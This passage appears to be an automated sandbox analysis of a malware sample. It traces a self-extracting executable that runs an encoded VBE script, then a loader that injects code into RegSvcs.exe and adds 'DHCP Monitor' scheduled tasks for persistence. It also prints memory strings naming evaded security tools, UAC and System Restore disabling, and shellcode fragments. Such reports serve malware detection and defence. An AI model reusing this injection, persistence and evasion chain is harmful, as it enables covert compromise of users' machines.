Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0096C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0097B348 FindFirstFileExA,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002BE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002BD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002CA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002CA488 FindFirstFileW,Sleep,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002C65F1 FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_0028C642 FindFirstFileExW,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002C7248 FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002C72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002BDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_00255D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_00977DEE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00275078 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

Code function: 0_2_0096F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

Code function: 0_2_0097C030 GetProcessHeap,

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_002CF3FF BlockInput,

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

Memory allocated: page read and write | page guard

Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0096F9D5 SetUnhandledExceptionFilter,
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0096F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0096FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_00978EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00270D65 SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002829B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00270BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00270FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

HIPS / PFW / Operating System Protection Evasion

Starts an encoded Visual Basic Script (VBE)

Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" Update-ta.l.vbe
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" Update-ta.l.vbe

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1100000 protect: page execute and read and write

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1100000 value starts with: 4D5A

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1100000
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: FC0000

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_002BBB02 SendInput,keybd_event,

Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" Update-ta.l.vbe
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c boaliim.dat ikvvfncnn.bmp
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat boaliim.dat ikvvfncnn.bmp
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpE45C.tmp
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmpE586.tmp

Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: select * from antivirusproductf51e8b6/1////83c4/cffd/6
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sessionidonbitmapbitsionoldocessid;dword threadid
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tcpeyeem
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tcpeyets
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tcpeye.exee
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endif.
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endfunc
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c70ae2a444794b
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c71ce2a4516c7b23a3b4e02140b8u
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c71ce2a4516c7b23a3b4e02140b8r
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c718eeba446d7339879deb2540927991o
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c71deeb25541!
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c708eba95741
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: errorc
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c700f2a5527d601aa0bce12357886fbb4fg
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9cf2de6a45c41\|
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c71deeb255777417aa96ec3c7c6
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c70ae6bc5141t
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9da0fe3ac427d61269fq
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9cf2de6a45c41n
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: error
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ntdll.dll
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9cf2de6a45c41f
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: errorc
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ssssss
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ssssss5
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: binbufferetdata
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: colitems
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: usbrn
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ssssss[
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: objantivirusproductp
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: disablerm
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: powershelle
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: error'
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: antivirus
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ssssssb
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: binbuffer4
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bufferasm
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _runbinary_iswow64process
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bufferasmetdata
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: shellz
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ssssssw
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9cf2de6a45c41l
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ssssss
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ssssss&
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: procexp.exe
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: regshot.exe
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: regshot.exesd
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: process explorera
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: smartsniff
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: wireshark;
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: wireshark
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: antianalysis
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: procexp64.exe
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: process hackery
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: process hackerv
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: taskmgr.exe
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: process explorer
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: processhacker.exe%
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: taskmgr.exesr
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ptrtructcreatea5527d6d
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9cf2de6a45c41m
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kernel32.dllef5a7537d6v
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c71deeb25541`
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9cf2de6a45c41i
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ntunmapviewofsectiond6
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: iswow64process
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9cf2de6a45c417
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sexemodule61ef5a7537d68
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: byte[uctcreate!
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: asmrylende0fe3ac427d6*
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: byte[uctcreateb255777
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: virtualallocex
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: word[uctcreate
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dword_ptrc61ef5a7537d6
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: virtualallocex9ba597d6
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kernel32.dll7ca89775d4
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avastui.exeixreloc8b1
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: binaryen
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: user32.dllv
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ndowprocw_
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _crypt_derivekey@
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: __crypt_dllhandlesetadr
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avgui.exefcountdec//6{
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: __crypt_dllhandle\|
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _crypt_decryptdataa326e
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: colitems8d3c7a7e851e87
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avgsvc.exe///6b//65//7
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: binbufferetptr
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sexemodule3
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: objantivirusproducte8e4
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: __crypt_refcountnd ad=
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _runbinary_fixreloc ad&
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: disablesysrestore/
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: execquery
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bufferasmetptr
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sssssseplace
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: displayname
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: __crypt_refcountdecere
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: egui.exerivekeyand ad
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avastsvc.exextset
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: gdisharedhandletablee
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y08644747068671a053e
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3499bfda1b69b8cj
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 7424/85/e838//////83c4/8c3h,
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 525153565733c/648b7/3/8b76
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 8b761c8b6e/88b7e2/8b363847
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 75f38/3f6b74/78/3f4b74/2eb
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 8bc55f5e5b595a5dc355525153h-
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 578b6c241c85ed74438b453c8b
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 2878/3d58b4a188b5a2//3dde3
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cf/d/3f8ebf
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: /x6/e84e//////6b//65//72//6e//65//6c//33//32//////6e//74//64//6c//6c//////////////////////////////////////////////////////////////////////////////////////////////////////5b8bfc6a42e8bb/3////8b54242889118b54242c6a3ee8aa/3////89116a4ae8a1/3////89396a1e6a3ce89d/3////6a2268f4//////e891/3////6a266a24e888/3////6a2a6a4/e87f/3////
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 6a2e6a/ce876/3////6a3268c8//////e86a/3////6a2ae85c/3////8b/9c7/144//////6a12e84d/3////685be814cf51e879/3////6a3ee83b/3////8bd16a1ee832/3////6a4/ff32ff31ffd/6a12e823/3////685be814cf51e84f/3////6a1ee811/3////8b/98b513c6a3ee8/5/3////8b39/3fa6a22e8fa/2////8b/968f8//////5751ffd/6a//e8e8/2////6888feb31651e814/3////6a2ee8d6/2//
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: //8b396a2ae8cd/2////8b116a42e8c4/2////57526a//6a//6a/46a//6a//6a//6a//ff31ffd/6a12e8a9/2////68d/371/f251e8d5/2////6a22e897/2////8b116a2ee88e/2////8b/9ff7234ff31ffd/6a//e87e/2////689c951a6e51e8aa/2////6a22e86c/2////8b118b396a2ee861/2////8b/96a4/68//3/////ff725/ff7734ff31ffd/6a36e847/2////8bd16a22e83e/2////8b396a3ee835/2//
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: //8b316a22e82c/2////8b/16a2ee823/2////8b/952ff775456ff7/34ff316a//e81//2////68a16a3dd851e83c/2////83c4/cffd/6a12e8f9/1////685be814cf51e825/2////6a22e8e7/1////8b1183c2/66a3ae8db/1////6a/25251ffd/6a36e8ce/1////c7/1////////b828//////6a36e8bc/1////f7216a1ee8b3/1////8b118b523c81c2f8///////3d/6a3ee89f/1/////3116a26e896/1////6a
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 2852ff316a12e88a/1////685be814cf51e8b6/1////83c4/cffd/6a26e873/1////8b398b/98b71146a3ee865/1/////3316a26e85c/1////8b/98b51/c6a22e85//1////8b/9/351346a46e844/1////8bc16a2ee83b/1////8b/95/ff771/5652ff316a//e82a/1////68a16a3dd851e856/1////83c4/cffd/6a36e813/1////8b1183c2/189116a3ae8/5/1////8b/93bca/f8533ffffff6a32e8f4//////
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 8b/9c7/1/7///1//6a//e8e5//////68d2c7a76851e811/1////6a32e8d3//////8b116a2ee8ca//////8b/952ff71/4ffd/6a22e8bb//////8b3983c7346a32e8af//////8b318bb6a4//////83c6/86a2ee89d//////8b116a46e894//////516a/45756ff326a//e886//////68a16a3dd851e8b2//////83c4/cffd/6a22e86f//////8b/98b5128/351346a32e86///////8b/981c1b///////89116a//e8
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 4f//////68d3c7a7e851e87b//////6a32e83d//////8bd16a2ee834//////8b/9ff32ff71/4ffd/6a//e824//////68883f4a9e51e85///////6a2ee812//////8b/9ff71/4ffd/6a4ae8/4//////8b2161c38bcb/34c24/4c36a//e8f2ffffff6854caaf9151e81e//////6a4/68//1/////ff7424186a//ffd/ff742414e8cfffffff89/183c41/c3e822//////68a44e/eec5/e84b//////83c4/8ff7424/4
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ffd/ff7424/85/e838//////83c4/8c355525153565733c/648b7/3/8b76/c8b761c8b6e/88b7e2/8b3638471875f38/3f6b74/78/3f4b74/2ebe78bc55f5e5b595a5dc35552515356578b6c241c85ed74438b453c8b542878/3d58b4a188b5a2//3dde33/498b348b/3f533ff33c/fcac84c/74/7c1cf/d/3f8ebf43b7c242/75e18b5a24/3dd668b/c4b8b5a1c/3dd8b/48b/3c55f5e5b595a5dc3c3////////r
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\windows
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @exitmethoden0
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @exitmethodpo
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: antianalysis!
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _reversep,
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: disableuac
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @exitcode
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\users\user
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: antitask`+
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: xcountcharso
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: fillattributer
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: eghgwwhcc
